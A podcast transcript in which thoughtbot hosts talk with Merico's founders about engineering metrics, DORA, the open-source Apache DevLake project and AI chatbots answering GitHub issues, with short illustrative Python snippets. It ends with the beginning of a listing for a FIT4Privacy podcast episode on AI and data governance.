LinkedIn (https://www.linkedin.com/in/henry-hezheng-yin-88116a52/). Follow Maxim Wheatley on LinkedIn (https://www.linkedin.com/in/maximwheatley/) or X (https://twitter.com/MaximWheatley). Follow thoughtbot on X (https://twitter.com/thoughtbot) or LinkedIn (https://www.linkedin.com/company/150727/). Become a Sponsor (https://thoughtbot.com/sponsorship) of Giant Robots! Transcript: VICTORIA: This is the Giant Robots Smashing Into Other Giant Robots podcast, where we explore the design, development, and business of great products. I'm your host, Victoria Guido. And with me today is Henry Yin, Co-Founder and CTO of Merico, and Maxim Wheatley, the first employee and Community Leader of Merico, creating data-driven developer tools for forward-thinking devs. Thank you for joining us. HENRY: Thanks for having us. MAXIM: Glad to be here, Victoria. Thank you. VICTORIA: And we also have a special guest co-host today, the CTO of thoughtbot, Joe Ferris. JOE: Hello. VICTORIA: Okay. All right. So, I met Henry and Maxim at the 7CTOs Conference in San Diego back in November. And I understand that Henry, you are also an avid rock climber. HENRY: Yes. I know you were also in Vegas during Thanksgiving. And I sort of have [inaudible 00:49] of a tradition to go to Vegas every Thanksgiving to Red Rock National Park. Yeah, I'd love to know more about how was your trip to Vegas this Thanksgiving. VICTORIA: Yes. I got to go to Vegas as well. We had a bit of rain, actually. 
So, we try not to climb on sandstone after the rain and ended up doing some sport climbing on limestone around the Blue Diamond Valley area; a little bit light on climbing for me, actually, but still beautiful out there. I loved being in Red Rock Canyon outside of Las Vegas. And I do find that there's just a lot of developers and engineers who have an affinity for climbing. I'm not sure what exactly that connection is. But I know, Joe, you also have a little bit of climbing and mountaineering experience, right? JOE: Yeah. I used to climb a good deal. I actually went climbing for the first time in, like, three years this past weekend, and it was truly pathetic. But you have to [laughs] start somewhere. VICTORIA: That's right. And, Henry, how long have you been climbing for? HENRY: For about five years. I like to spend my time in nature when I'm not working: hiking, climbing, skiing, scuba diving, all of the good outdoor activities. VICTORIA: That's great. And I understand you were bouldering in Vegas, right? Did you go to Kraft Boulders? HENRY: Yeah, we went to Kraft, also Red Spring. It was a surprise for me. I was able to upgrade my outdoor bouldering grade to V7 this year at Red Spring and Monkey Wrench. There were always some surprises for me. When I went to Red Rock National Park last year, I met Alex Honnold there, who was shooting a documentary, and he was really, really friendly. So, really enjoying every Thanksgiving trip to Vegas. VICTORIA: That's awesome. Yeah, well, congratulations on V7. That's great. It's always good to get a new grade. And I'm kind of in the same boat with Joe, where I'm just constantly restarting my climbing career. So [laughs], I haven't had a chance to push a grade like that in a little while. But that sounds like a lot of fun. HENRY: Yeah, it's really hard to be consistent on climbing when you have, like, a full-time job, and then there's so much going on in life. It's always a challenge.
So, I began studying neuroscience at Georgetown University in Washington, D.C. I was about to go to medical school and, in my high school years had explored entrepreneurship in a really basic way. I think, like many people do, finding ways to monetize my hobbies and really kind of getting infected with that bug that I could create something, make money from it, and kind of be the master of my own destiny, for lack of less cliché terms. So, not long after graduating, I started my first job that recruited me into a seed-stage venture capital, and from there, I had the opportunity to help early-stage startups, invest in them. I was managing a startup accelerator out there. From there, produced a documentary that followed those startups. Not long after all of that, I ended up co-founding a consumer electronics company where I was leading product, so doing lots of mechanical, electrical, and a bit of software engineering. And without taking too long, those were certainly kind of two of the more formative things. But one way or another, I've spent my whole career now in startups and, especially early-stage ones. It was something I was eager to do was kind of take some of the high-level abstract science that I had learned in my undergraduate and kind of apply some of those frameworks to some of the things that I do today. VICTORIA: That's super interesting. And now I'm curious about you, Henry, and your background. And what led you to get the idea for Merico? HENRY: Yeah. My professional career is actually much simpler because Merico was my first company and my first job. Before Merico, I was a PhD student at UC Berkeley studying computer science. My research was an intersection of software engineering and machine learning. And back then, we were tackling this research problem of how do we fairly measure the developer contributions in a software project? And the reason we are interested in this project has to do with the open-source funding problem. So, let's say an open-source project gets 100k donations from Google. How does the maintainers can automatically distribute all of the donations to sometimes hundreds or thousands of contributors according to their varying level of contributions? So, that was the problem we were interested in. We did research on this for about a year. We published a paper. And later on, you know, we started the company with my, you know, co-authors. And that's how the story began for Merico. VICTORIA: I really love that. And maybe you could tell me just a little bit more about what Merico is and why a company may be interested in trying out your services. HENRY: The product we're currently offering actually is a little bit different from what we set out to build. At the very beginning, we were building this platform for open-source funding problem that we can give an open-source project. We can automatically, using algorithm, measure developer contributions and automatically distribute donations to all developers. But then we encountered some technical and business challenges. So, we took out the metrics component from the previous idea and launched this new product in the engineering metric space. And this time, we focus on helping engineering leaders better understand the health of their engineering work. So, this is the Merico analytics platform that we're currently offering to software engineering teams. JOE: It's interesting. I've seen some products that try to judge the health of a codebase, but it sounds like this is more trying to judge the health of the team. 
MAXIM: Yeah, I think that's generally fair to say. As we've evolved, we've certainly liked to describe ourselves as, you know, I think a lot of people are familiar with observability tools, which help ultimately ascertain, like, the performance of the technology, right? Like, it's assessing, visualizing, chopping up the machine-generated data. And we thought there would be a tremendous amount of value in being, essentially, observability for the human-generated data. And I think, ultimately, what we found on our journey is that there's a tremendous amount of frustration, especially in larger teams, not in looking to use a tool like that for any kind of, like, policing type thing, right? Like, no one's looking if they're doing it right, at least looking to figure out, like, oh, who's underperforming, or who do we need to yell at? But really trying to figure out, like, where are the strengths? Like, how can we improve our processes? How can we make sure we're delivering better software more reliably, more sustainably? Like how are we balancing that trade-off between new features, upgrades, and managing tech debt and bugs? We've ultimately just worked tirelessly to, hopefully, fill in those blind spots for people. And so far, I'm pleased to say that the reception has been really positive. We've, I think, tapped into a somewhat subtle but nonetheless really important pain point for a lot of teams around the world. VICTORIA: Yeah. And, Henry, you said that you started it based on some of the research that you did at UC Berkeley. I also understand you leaned on the research from the DevOps research from DORA. Can you tell me a little bit more about that and what you found insightful from the research that was out there and already existed? MAXIM: So, I think what's really funny, and it really speaks to, I think, the importance in product development of just getting out there and speaking with your potential users or actual users, and despite all of the deep, deep research we had done on the topic of understanding engineering, we really hadn't touched on DORA too much. And this is probably going back about five years now. Henry and I were taking a customer meeting with an engineering leader at Yahoo out in the Bay Area. He kind of revealed this to us basically where he's like, "Oh, you guys should really look at incorporating DORA into this thing. Like, all of the metrics, all of the analytics you're building super cool, super interesting, but DORA really has this great framework, and you guys should look into it." And in hindsight, I think we can now [chuckles], honestly, admit to ourselves, even if it maybe was a bit embarrassing at the time where both Henry and I were like, "What? What is that? Like, what's Dora?" And we ended up looking into it and since then, have really become evangelists for the framework. And I'll pass it to Henry to talk about, like, what that journey has looked like. HENRY: Thanks, Maxim. I think what's cool about DORA is in terms of using metrics, there's always this challenge called Goodhart's Law, right? So, whenever a metric becomes a target, the metric ceases to be a good metric because people are going to find ways to game the metric. So, I think what's cool about DORA is that it actually offers not just one metric but four key metrics that bring balance to covering both the stability and velocity. So, when you look at DORA metrics, you can't just optimize for velocity and sacrificing your stability.
But you have to look at all four metrics at the same time, and that's harder to game. So, I think that's why it's become more and more popular in the industry as the starting point for using metrics for data-driven engineering. VICTORIA: Yeah. And I like how DORA also represents it as the metrics and how they apply to where you are in the lifecycle of your product. So, I'm curious: with Merico, what kind of insights do you think engineering leaders can gain from having this data that will unlock some of their team's potential? MAXIM: So, I think one of the most foundational things before we get into any detailed metrics is I think it's more important than ever, especially given that so many of us are remote, right? Where the general processes of software engineering are generally difficult to understand, right? They're nuanced. They tend to kind of happen in relative isolation until a PR is reviewed and merged. And it can be challenging, of course, to understand what's being done, how consistently, how well, like, where are the good parts, where are the bad parts. And I think that problem gets really exacerbated, especially in a remote setting where no one is necessarily in the same place. So, on a foundational level, I think we've really worked hard to solve that challenge, where just being able to see, like, how are we doing? And to that point, I think what we've found before anyone even dives too deep into all of the insights that we can deliver, I think there's a tremendous amount of appetite for anyone who's looking to get into that practice of constant improvement and figuring out how to level up the work they're doing, just setting close benchmarks, figuring out, like, okay, when we talk about more nebulous or maybe subjective terms like speed, or quality, what does good look like? What does consistent look like? Being able to just tie those things to something that really kind of unifies the vocabulary is something I always like to say, where, okay, now, even if we're not focused on a specific metric, or we don't have a really particular goal in mind that we want to assess, now we're at least starting the conversation as a team from a place where when we talk about quality, we have something that's shared between us. We understand what we're referring to. And when we're talking about speed, we can also have something consistent to talk about there. And within all of that, I think one of the most powerful things is it helps to really kind of ground the conversations around the trade-offs, right? There's always that common saying: the triangle of trade-offs is where it's, like, you can have it cheap; you can have it fast, and you can have it good, but you can only have two. And I think with DORA, with all of these different frameworks with many metrics, it helps to really solidify what those trade-offs look like. And that's, for me at least, been one of the most impactful things to watch: is our global users have really started evolving their practices with it. HENRY: Yeah. And I want to add to Maxim's answer. But before that, I just want to quickly mention how our products are structured. So, Merico actually has an open-source component and a proprietary component. So, the open-source component is called Apache DevLake. It's an open-source project we created first within Merico and later on donated to the Apache Software Foundation. And now, it's one of the most popular engineering metrics tools out there.
And then, on top of that, we built a SaaS offering called DevInsight Cloud, which is powered by Apache DevLake. So, with DevLake, the open-source project, you can set up your data connections, connect DevLake to all of the dev tools you're using, and then we collect the data. And then we provide many different flavors of dashboards for our users. Many of those dashboards are structured around the different questions engineering teams might want to ask. For example: how fast are we responding to our customers' requirements? For that question, we look at metrics like change lead time. Or, for a question like, how accurate is our sprint planning? In that case, the dashboard will show metrics relating to the percentage of planned issues we deliver in every sprint. So, based on the questions the team wants to answer, we provide different dashboards that help them extract insights from the data in their DevOps tools.
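As a rough illustration of the sprint-accuracy question Henry mentions, here is a minimal sketch; the issue records are made up for the example and are not DevLake's actual data model:

# Hypothetical sprint records: issue id -> (planned_for_sprint, delivered_in_sprint)
issues = {
    "PROJ-101": (True, True),
    "PROJ-102": (True, False),   # planned but slipped
    "PROJ-103": (True, True),
    "PROJ-104": (False, True),   # unplanned work pulled in mid-sprint
}

# Share of planned issues actually delivered this sprint.
planned = [delivered for was_planned, delivered in issues.values() if was_planned]
planning_accuracy = sum(planned) / len(planned)

# Share of this sprint's issues that were never planned.
unplanned_share = sum(1 for was_planned, _ in issues.values() if not was_planned) / len(issues)

print(f"planning accuracy: {planning_accuracy:.0%}, unplanned work: {unplanned_share:.0%}")

Tracked per sprint over time, it is the trend in these numbers, rather than any single reading, that carries the signal.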
JOE: It's really interesting that you donated it to Apache. And I feel like the hybrid SaaS open-source model is really common, and I've become more and more skeptical of it over the years as companies start out open source and then, once they start getting competitors, change the license. But by donating it to Apache, you sort of sidestep that potential trust issue.

MAXIM: Yeah, you've hit the nail on the head with that one, because, in many ways, for us, engaging with Apache in the way that we have was ultimately born out of the observations we had about the shortcomings of other products in the space. The first reason was very practical: we realized quickly that if we wanted to offer the most complete visibility possible, it would require connections to so many different products, right? I think anyone can look at their engineering toolchain and identify perhaps 7, 9, 10 different things they're using on a day-to-day basis. Oftentimes, those aren't shared between companies, either. So, part one was just figuring out: how do we build a framework that makes it easy for developers to build a plugin and contribute to the project if there's something they want to incorporate that isn't already supported? And part two is, I think, much more important and far more profound, which is developer trust, right? We saw so many different products out there that claimed to deliver these insights but really had this kind of black-box approach: data goes in, something happens, insights come out. How is it doing that? How is it weighting things? What is it calculating? What variables are incorporated? All of that is a mystery, and that really leads to developers, rightfully, not having a basis to trust what's actually being shown to them. So, for us, the question was: what's the maximum amount of transparency that we could possibly offer? Well, open source is probably the best answer to that question. We made sure the entirety of the codebase is something people can take a look at and modify. They can dive into the underlying queries and algorithms and how everything is working to gain a total sense of trust in how this thing works. And if they need to modify something to account for some nuanced details of how their team works, they can also do that.

And to your point, you know, I would definitely agree that one of the worst things we see in the open-source community is companies that are open source in name only, right? Where it's really more of a marketing or sales thing than anything: oh, let's tap into the good faith of open source, but really, somehow or another, through bait and switch, through partial open source, through license changes, whatever it is, we're open source in name only but really a proprietary, closed-source product. So, for us, donating the core of DevLake to the Apache Foundation was essentially our way of walking the talk. No one can doubt at this point whether this thing is suddenly going to have its license changed or suddenly going to go closed-source. The answer to that now is a definitive no, because it is part of that ecosystem. And with the aspirations we've had to build something that is not just a tool but, hopefully, long-term becomes foundational technology, I think that gives people confidence and faith that this is something they can really invest in. They can plumb it into their processes in a deep and meaningful way with no concerns whatsoever that something will suddenly change and turn all of that work into something they didn't expect.

JOE: I think a lot of companies guard their source code like it's their secret sauce, but my experience has been more that it's the secret shame [laughs].

HENRY: [laughs]

MAXIM: There's no doubt that, in my role with our open-source product especially, driving our community, we've really seen the magic of what a community-driven product can be. And open source, I think, is the truest expression of a community-driven product. We have a Slack community with nearly 1,000 developers in it now. Naturally, some of those developers are in there just to ask and answer questions. Some are intensely involved: they're suggesting improvements, they're suggesting new features, they're finding ways to refine things. And it really is that fantastic culture, which I'm really proud we've cultivated, where the best idea ships. If you've got a good idea, throw it into a GitHub issue or a comment. Let's see how the community responds to it. Let's see if someone wants to pick it up. Let's see if someone wants to submit a PR. If it's good, it goes into production, and then the entire community benefits. And, for me, that's something I've found endlessly exciting.

HENRY: Yeah. I think Joe made a really good point on the secret sauce part, because I don't think the source code is our secret sauce. There's no rocket science in DevLake. If we break it down, it's really just some UI/UX plus data pipelines. What's making DevLake successful is really the trust and collaboration that we're building with the open-source community. When it comes to trust, there are two aspects. First, trust in metric accuracy, right? With a lot of proprietary software, you don't know how the metrics are calculated, and if people don't know how the metrics are calculated, they can't really trust them and use them. And second, the trust that they can always use this software and there's no vendor lock-in.
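To picture the plugin framework Maxim describes, here is a purely hypothetical sketch of a data-source plugin interface; the names and shapes are invented for illustration and are not DevLake's actual API:

from abc import ABC, abstractmethod

class DataSourcePlugin(ABC):
    """Hypothetical contract every connector implements."""

    name: str

    @abstractmethod
    def collect(self, since: str) -> list[dict]:
        """Fetch raw records (commits, PRs, issues, ...) from the upstream tool."""

    @abstractmethod
    def transform(self, raw: list[dict]) -> list[dict]:
        """Normalize raw records into the tool's shared domain model."""

class GitHubPlugin(DataSourcePlugin):
    name = "github"

    def collect(self, since):
        # A real connector would page through the GitHub API here.
        return [{"type": "pr", "merged_at": "2023-11-01T10:00:00Z"}]

    def transform(self, raw):
        return [{"entity": "pull_request", **record} for record in raw]

def run_pipeline(plugins: list[DataSourcePlugin], since: str) -> list[dict]:
    # The host only knows the interface, so community-contributed plugins drop in uniformly.
    records = []
    for plugin in plugins:
        records.extend(plugin.transform(plugin.collect(since)))
    return records

print(run_pipeline([GitHubPlugin()], since="2023-10-01"))

The design choice this illustrates is the one Maxim names: keeping the connector surface small and public is what lets a community add the 7, 9, 10 tools any given team happens to use.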
And when it comes to collaboration, we're seeing that many of our data sources and dashboards were contributed not by our core developers but by the community. And the community really brings their insights and use cases into DevLake, making it more successful and more applicable to more teams in different areas of software engineering.

MID-ROLL AD: Are you an entrepreneur or start-up founder looking to gain confidence in the way forward for your idea? At thoughtbot, we know you're tight on time and investment, which is why we've created targeted 1-hour remote workshops to help you develop a concrete plan for your product's next steps. Over four interactive sessions, we work with you on research, product design sprint, critical path, and presentation prep so that you and your team are better equipped with the skills and knowledge for success. Find out how we can help you move the needle at tbot.io/entrepreneurs.

VICTORIA: I understand you've taken some innovative approaches to using AI in your open-source repositories to respond to issues and questions from your developers. So, can you tell me a little bit more about that?

HENRY: Absolutely. I self-identify as a builder. And one characteristic of a builder is to always chase after the dream of building infinite things within a finite lifespan. So, I was always thinking about how we can be more productive, how we can, you know, get better at getting better. And this year, AI is huge, and there are so many AI-powered tools that can help us achieve more in terms of delivering software. Internally, we had a hackathon, and one project that came out of it is an AI-powered coding assistant called DevChat. We have made it public at devchat.ai. But we've also been closely following what other AI-powered tools can make software developers' or open-source maintainers' lives easier. And we've observed more and more open-source projects adopting AI chatbots to help them respond to GitHub issues. So, I recently did a case study on a pretty popular open-source project called LangChain. It's the hot kid in the AI space right now. And it's using a chatbot called Dosu to help respond to issues. I had some interesting findings from the case study.

VICTORIA: In what ways was that chatbot really helpful, and in what ways did it not really work that well?

HENRY: Yeah, I was thinking about how to measure the effectiveness of that chatbot, and I realized that there is a feature built into GitHub, which is reactions to comments. So, how the chatbot works is: whenever there is a new issue, the chatbot basically runs a retrieval-augmented generation pipeline and uses a language model to generate a response to the issue. And then people leave reactions to that comment by the chatbot, mostly thumbs up and thumbs down. So, what I did is collect all of the issues from the LangChain repository and look at how many thumbs up and thumbs down the Dosu chatbot got from all of the comments it left on those issues. What I found is that across the 2,600 issues that the Dosu chatbot helped with, it got around 900 thumbs up and 1,300 thumbs down. So, then it comes to: how do we interpret this data, right? Because the fact that it got more thumbs down than thumbs up doesn't necessarily mean that it's not useful, or that it's harmful to the developers.
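A minimal sketch of the kind of tally Henry describes, using GitHub's REST API via the requests library; the token is a placeholder, and matching the bot by a login containing "dosu" is an assumption made for illustration, not the actual methodology of the case study:

import requests

TOKEN = "ghp_..."  # placeholder personal access token
headers = {"Authorization": f"Bearer {TOKEN}", "Accept": "application/vnd.github+json"}

up = down = 0
url = "https://api.github.com/repos/langchain-ai/langchain/issues/comments"
params = {"per_page": 100}

while url:
    resp = requests.get(url, headers=headers, params=params)
    resp.raise_for_status()
    for comment in resp.json():
        # Assumed heuristic: the bot's comments come from a login containing "dosu".
        if "dosu" in comment["user"]["login"].lower():
            reactions = comment.get("reactions", {})
            up += reactions.get("+1", 0)
            down += reactions.get("-1", 0)
    url = resp.links.get("next", {}).get("url")  # follow Link-header pagination
    params = None  # the "next" URL already carries its query string

print(f"thumbs up: {up}, thumbs down: {down}")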
So, to answer that question, I actually looked at some examples of thumbs-up and thumbs-down comments. And what I found is that a thumbs down doesn't mean the chatbot is harmful. It's mostly developers signaling to the open-source maintainers: your chatbot is not helping in this case, and we need human intervention. But where there's a thumbs up, the chatbot is actually helping a lot. There's one issue where someone posted a question, and the chatbot just wrote the code and basically made a suggestion on how to resolve the issue. And the human response was, "Damn, it worked." That was very surprising to me, and it made me consider adopting similar technology and AI-powered tools for our own open-source project.

VICTORIA: That's very cool. Well, I want to go back to the beginning of Merico. When you first got started, and you were trying to understand your customers and what they need, was there anything surprising in that early discovery process that made you change your strategy?

HENRY: So, one challenge we faced when we first explored the open-source funding allocation problem space is that our algorithm looks at the Git repository. But in software engineering, and especially in open-source collaboration, there are so many activities happening outside of the repos on GitHub. For example, I might be an evangelist, and my day-to-day work might be engaging in community work or talking about the open-source project at conferences. All of those things were not captured by our algorithm, which was only looking at the GitHub repository at the time. So, that was one of the technical challenges that we faced, and it led us to switch over to more of the system-driven metrics side.

VICTORIA: Gotcha. Over the years, how has Merico grown? What has changed between when you first started and today?

HENRY: So, one thing is the team size. When we just got started, we only had the three co-founders and Maxim. Now we have grown to a team of 70 members, fully distributed across multiple continents. Those are pretty interesting dynamics to handle, and we learned a lot about how to build an effective, cohesive team along the way. In terms of product, DevLake now has more than 900 developers in our Slack community, and we track over 360 companies using DevLake. So, we've definitely come a long way since we started the journey. And tomorrow, actually, Maxim and I are going to host our end-of-year Apache DevLake Community Meetup, featuring Nathen Harvey, Google's DORA team lead. Yeah, we've definitely made some progress in the four years we've been working on Merico.

VICTORIA: Well, that's exciting. Well, say hi to Nathen for me. I helped take over DevOps DC, which he used to run, with some of the other organizers way back in the day, so [laughs] that's great. What challenges do you see on the horizon for Merico and DevLake?

MAXIM: One of the challenges I think about a lot, and I think it's front of mind for many people, especially in software engineering but at this point in nearly every profession, is: what does AI mean for everything we're doing? What does the future look like when developers are producing the majority of their code through prompt-based approaches versus code-based approaches, right? How do we start thinking about how we coherently assess that?
Like, how do you redefine what the value is in a scenario where, if we fast forward a few years, the AI is so good that the code is essentially perfect? What does success look like then? How do you start thinking about what a good team is if everyone is shipping 9-out-of-10 PRs nearly every time because they're all using a unified framework supported by AI? So, I think that's certainly one of the challenges I envision in the future. More practically, many startups have been contending with the macro climate and the fundraising climate. Many of the companies out there, us included, had better conditions in 2019 and 2020 to raise funds at more favorable valuations and perhaps more relaxed terms, given the climate of the public markets and, you know, monetary policy. As we're all experiencing, that has tightened things up: revenue expectations are higher, and the benchmark for getting to a highly profitable place is set a lot higher. It's not a challenge that's unique to us in any way; I think it's true for almost every company out there. It's now about thinking in a more disciplined way about how you meet the market demands without compromising on the product vision, the roadmap, and the strategies you've put in place that are working but are maybe coming under a little more pressure, given the new set of rules that have been laid out for all of us.

VICTORIA: Yeah, that is going to be a challenge. And do you see the company and the product solving some of those challenges in a unique way?

HENRY: I've been thinking about how AI can fulfill the promise of making developers 10x developers. I'm an early adopter and big fan of GitHub Copilot. I think it really helps with writing the boilerplate code, but it's improving my productivity by maybe 20% to 30%. That's still pretty far from 10x. So, I'm thinking about how Merico's solutions can help fill the gap a little bit. In terms of Apache DevLake and its SaaS offering, we are helping with team collaboration and measuring software delivery performance: how the team can improve as a whole. And then, recently, we had a spin-off, the AI-powered coding assistant DevChat. That's more about empowering individual developers with testing, refactoring, these common workflows. And one big thing for us in the future is how we can combine these two components, the team collaboration and improvement tool, DevLake, with the individual coding assistant, DevChat: how they can be integrated to empower developers. I think that's the big question for Merico ahead.

JOE: Have you used Merico to judge the contributions of AI to a project?

HENRY: [laughs] So, actually, after we pivoted to engineering metrics, we now focus less on individual contribution, because that can sometimes be counterproductive. Whenever you visualize it, people can become defensive and try to optimize for the metrics that measure individual contributions. So, nowadays we no longer offer that kind of metric within DevLake, if that makes sense.

MAXIM: And that kind of goes back to one of Victoria's earlier questions about what surprised us in the journey.
Early on, we had this very benevolent perspective, and I really want to underline that: we never sought to judge individuals in a negative way. We were looking for ways to make it useful, even to the point of exploring different ways to give developers badges and different kinds of accomplishment milestones, things to signal their strengths and accomplishments. But what we've found in that journey, and I would say this strongly, is that the only way metrics of any kind serve an organization is when they support a healthy culture. To that end, we always like to preach: it's processes, not people. It's figuring out if you're hiring correctly, if you're making smart decisions about who's on the team. You have to operate, within reason, with a default assumption that those people are doing their best work. They're trying to move the company forward. They're trying to make good decisions to better serve the customers, the company, and the product. With that in mind, what you're really looking to do is figure out what is happening within the underlying processes that get something from thought to production, and how you clear the way for people. And I think that's been almost a tectonic shift for our company over the years: fully transitioning to that view. In some ways, DORA has represented almost a best practice for processes over people, right? It's figuring out, between quality and speed, how are you doing? Where are those trade-offs? And then, within the processes that account for those outcomes, how can you really be improving things? So, for us, the number one thing is figuring out how we keep doubling down on processes, not people, and how we make sure that we're not just telling people we're on their side and taking a humanistic perspective on wanting to improve their lives, but actually doing it with the product.

HENRY: But putting the challenge of measuring individual contributions aside, I'm as curious as Joe about AI's role in software engineering. I expect to see more and more involvement of AI, gradually replacing low-level, then medium-level, and, in the future, even high-level tasks for humans, so we can just focus on the objective instead of the implementation.

VICTORIA: I can imagine, especially if you're starting to integrate AI tools into your systems and you're growing your company at scale, that the ability to have a natural intuition about what's going on really becomes a challenge, and the data you can derive from some of these products could help you make better decisions and all different types of things. So, I'm kind of curious to hear from Joe: with your history of open-source contribution and being a part of many different development teams, what kind of information do you wish you had to help you make decisions in your role?

JOE: Yeah, that's an interesting question. I've used some tools that try to identify problem spots in the code, but it'd be interesting to see the results of tools that analyze problem spots in the process. Like, I'd like to learn more about how that works.

HENRY: I'm curious; one question for Joe.
What is your favorite non-AI-powered code scanning tool that you find useful for yourself or for your team?

JOE: I think the most common static analysis tool I use is something to find the Git churn in a repository. Some of this is probably because, these days, I've worked mostly on projects with dynamic languages, so there's a limit to how much static analysis you can do of, you know, a Ruby or a Python codebase. But just analyzing which parts of the application change the most helps you find which parts are likely to be the buggiest and the most complex. Every application tends to involve some central model. Like, if you're making an e-commerce site, then probably products are going to have a lot of the core logic, and purchases will have a lot of the core logic. And identifying those centers of gravity just through the Git statistics has helped me find places that need to be reworked.

HENRY: That's really interesting. Is it something like a hotspot analysis? And when you find a hotspot, would you invest more resources in refactoring the hotspot to make it more maintainable?

JOE: Right, exactly. You can use the statistics to see which files you should look at. And then, usually, when you actually go into the files, especially if you look at some of the changes to them, it's pretty clear that, for example, a class has become too large or something has become too tightly coupled.

HENRY: Gotcha.
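A minimal sketch of the churn analysis Joe describes, counting how often each file appears in the Git history; the one-year window and the top-ten cutoff are arbitrary choices:

import subprocess
from collections import Counter

# List every file path touched by every commit in the last year.
log = subprocess.run(
    ["git", "log", "--since=1 year ago", "--name-only", "--pretty=format:"],
    capture_output=True, text=True, check=True,
).stdout

churn = Counter(line for line in log.splitlines() if line.strip())

# The most frequently changed files are candidate hotspots worth a closer look.
for path, changes in churn.most_common(10):
    print(f"{changes:5d}  {path}")

Pairing these counts with a per-file complexity measure is the usual next step, so the list surfaces files that are both volatile and hard to change: the "centers of gravity" Joe mentions.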
VICTORIA: Yeah. And so, if you could go back in time five years and give yourself some advice when you first started along this journey, what advice would you give yourself?

MAXIM: I'll answer the question in two ways: first for the company and then for myself personally. For the company, what I would say is: especially when you're in that pre-product-market-fit space and maybe struggling to figure out how to solve a challenge that really matters, you need to think carefully about how you yourself would be using your product. And if you're finding reasons you wouldn't, pay really careful attention to those. Early on in our journey, we found ourselves asking: okay, we're a smaller, earlier-stage team; perhaps small improvements in productivity or quality aren't necessarily going to move the needle. That's one of the reasons maybe we're not using this. Maybe our developers are already at bandwidth, so it's not a question of unlocking more bandwidth or finding weak points or bottlenecks at that level, but of how we can dial in our own processes to let the whole team function more effectively. And the more we started thinking through that lens of what's useful to us, what's solving a pain point for us, the clearer things became; in many ways, DevLake was born out of that exact thinking. And now DevLake is used by hundreds of companies around the world and has this nearly thousand-developer community that supports it. I think that's testament to the power of that approach. For me personally, if I were to go back five years, I'm grateful to say there isn't a whole lot I would necessarily change. But if there's anything, it would just be to be consistently more brave in sharing ideas.

I think Merico has done a great job, and it's something I'm so proud of for us as a team, of really embracing new ideas and making sure the best idea ships. There isn't a title or a level of seniority that determines whether someone has the right to suggest or improve something. With that in mind, as a technical person but not a member of technical staff, so to speak, there were many occasions where I felt like, okay, maybe because of that, I shouldn't weigh in on certain things. And what I've found, and it's a trust-building thing as well, is that even if you're wrong, even if your suggestion misunderstands something or isn't quite on target, there's still a tremendous amount of value in just sharing a perspective, sharing a recommendation, and pushing it out there. So, it's something I would encourage myself, and everybody else in a healthy company, to feel comfortable doing: just keep sharing, because, ultimately, it's an accuracy-by-volume game to a certain degree. If I come up with one idea, I've got one swing at the bat. But if we as a collective come up with 100 ideas that we consider intelligently, we've got a much higher chance of a handful of those really pushing us forward. So, for me, that would be the advice I would give myself and anybody else.

HENRY: I'll follow the same structure: advice at the company level, then advice to myself as an individual. At the company level, my advice would be to fail fast, because every company needs to go through an exploration phase to find product-market fit, testing a couple of ideas before finding the right one; the same was true for us. I wish we had brought more structure to exploring those ideas, set deadlines and milestones to quickly test and filter out bad ideas, and accelerated the exploration process. So, fail fast would be my suggestion at the company level. At the individual level, I would say it's more about adapting to my CTO role. When I started the company, I still had that graduate-student hustle mindset. I love writing code myself, and it's okay to spend 100% of my time writing code when the company is five people, right? But it's not okay [chuckles] when we have a team of 40 engineers. I wish I'd had that realization earlier and transitioned to a real CTO role earlier, focusing more on technical evangelism and building out the technical and non-technical infrastructure to help my engineering teams be successful.

VICTORIA: Well, I really appreciate that. And is there anything else that you all would like to promote today?

HENRY: If you're an engineering leader looking to adopt a more data-driven approach to improving your software delivery performance, check out Apache DevLake. It's an open-source project, free to use, with some great dashboards, and it supports various data sources. And join our community. We have a pretty vibrant community on Slack, with a lot of developers and engineering leaders discussing how to get more value out of data and metrics and improve software delivery performance.

MAXIM: Yeah.
And to add to that: something we've found consistently is that there are plenty of data skeptics out there, rightfully so. A lot of analytics of every kind are really not very good, right? So, people are rightfully frustrated, or even traumatized, by them. And for the data skeptics out there, I would invite them to dive into the DevLake community and pose their challenges. If you think this stuff doesn't make sense, or you have concerns about it, come join the conversation, because that's really where the most productive discussions come from: not from people mutually high-fiving each other for a successful implementation of DORA. The really exciting moments come from the people in the community who are challenging it and saying, "You know what? Here's where I don't think something is useful, or where I think it could be improved." And it's not up to us as individuals to either bless or deny that; that's where the community gets really exciting, in those discussions. So, I would say: if you're a data skeptic, come and dive in, and, so long as you're respectful, challenge it. By doing so, you'll hopefully help not only yourself but everybody, which is what I love about this stuff so much.

JOE: I'm curious, does Merico use Merico?

HENRY: Yes. We've been dogfooding ourselves a lot, and a lot of the product improvement ideas actually come from our own dogfooding process. For example, there was one time we looked at a dashboard with the issue change lead time metric, and we found our issue change lead time had gone up over the past few months. We were trying to interpret whether that was a good thing or a bad thing, because looking at a single metric doesn't tell you the story behind the change. So, we improved the dashboard to include some covariates of the metric, some other related metrics, to help explain its trend. So yeah, dogfooding is always useful in improving the product.

VICTORIA: That's great. Well, thank you all so much for joining. I really enjoyed our conversation. You can subscribe to the show and find notes along with a complete transcript for this episode at giantrobots.fm. If you have questions or comments, email us at hosts@giantrobots.fm. And you can find me on Twitter @victori_ousg. This podcast is brought to you by thoughtbot and produced and edited by Mandy Moore. Thanks for listening. See you next time.

The FIT4PRIVACY Podcast - For those who care about privacy
How can organizations seize the AI opportunity with Balaji Ganesan and Punit Bhatia in The FIT4Privacy Podcast E103

The FIT4PRIVACY Podcast - For those who care about privacy

Play Episode Listen Later Jan 4, 2024 32:55


AI is a huge opportunity for businesses. How can organizations seize this opportunity? Well, by understanding how AI works, its opportunities and drawbacks, responsible AI, and data security. This is exactly what our guest Balaji Ganesan, Co-Founder and CEO of Privacera, and our host Punit Bhatia, CEO of FIT4Privacy, talk about in this episode. Take a listen now.

KEY CONVERSATION POINTS
AI in one word
How can businesses combine data governance and AI?
How can companies start AI programs
Responsible AI framework and policies
Data governance and data security
Closing

ABOUT THE GUEST
Balaji Ganesan is CEO and co-founder of Privacera. Before Privacera, Balaji and Privacera co-founder Don Bosco Durai also founded XA Secure. XA Secure was acquired by Hortonworks, which contributed the product to the Apache Software Foundation, where it was rebranded as Apache Ranger. Apache Ranger is now deployed in thousands of companies around the world, managing petabytes of data in Hadoop environments. Privacera's product is built on the foundation of Apache Ranger and provides a single pane of glass for securing sensitive data across on-prem and multiple cloud services such as AWS, Azure, Databricks, GCP, Snowflake, Starburst, and more.

ABOUT THE HOST
